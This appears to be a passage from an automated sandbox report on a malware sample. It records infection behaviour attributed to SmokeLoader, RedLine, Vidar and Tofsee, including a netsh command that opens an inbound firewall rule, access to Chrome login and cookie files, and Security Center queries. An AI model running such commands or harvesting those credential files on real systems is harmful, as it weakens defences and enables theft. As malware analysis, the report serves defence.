                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CBA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CBA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2757.exe VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00432800 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Uses netsh to modify the Windows network and firewall settingsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Modifies the windows firewallShow sources
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000009.00000002.519463361.0000021174C3D000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000009.00000002.519523482.0000021174D02000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.574771565.0000000001621000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.CBA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.CBA.exe.423fe20.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.CBA.exe.423fe20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000031.00000002.609571282.0000000003AA7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.403620699.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.401238970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.515289620.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000003.484873099.00000000034F2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.491680197.00000000009A3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.552523209.0000000002515000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.403113050.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.571203673.00000000029E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.568085789.0000000002810000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 1.2.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.haifbcd.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nkINykHreE.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.115B.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.1.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.574522590.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.566415908.0000000000961000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.525192064.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.533111165.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000003.469387095.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.476837740.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.sdiimdop.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.18D.exe.560000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 18D.exe PID: 4992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: sdiimdop.exe PID: 4560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.574522590.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.566415908.0000000000961000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.574236563.000000000074E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.525192064.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.571891585.0000000002B14000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.533111165.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000003.469387095.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.476837740.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CBA.exe PID: 7052, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.CBA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.CBA.exe.423fe20.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.0.CBA.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.CBA.exe.423fe20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000031.00000002.609571282.0000000003AA7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.403620699.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.401238970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.515289620.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000003.484873099.00000000034F2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.491680197.00000000009A3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.552523209.0000000002515000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.403113050.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.571203673.00000000029E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.568085789.0000000002810000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 1.2.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.haifbcd.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nkINykHreE.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.115B.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.1.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.574522590.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.566415908.0000000000961000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.525192064.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.533111165.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000003.469387095.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.476837740.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.sdiimdop.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.18D.exe.560000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 18D.exe PID: 4992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: sdiimdop.exe PID: 4560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Spearphishing Link1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools31OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Valid Accounts1Native API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Valid Accounts1Valid Accounts1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter2Windows Service14Access Token Manipulation1Software Packing34NTDSSystem Information Discovery147Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsService Execution3Network Logon ScriptWindows Service14Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol35Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonProcess Injection713DLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery881VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemVirtualization/Sandbox Evasion471Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion471Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection713KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
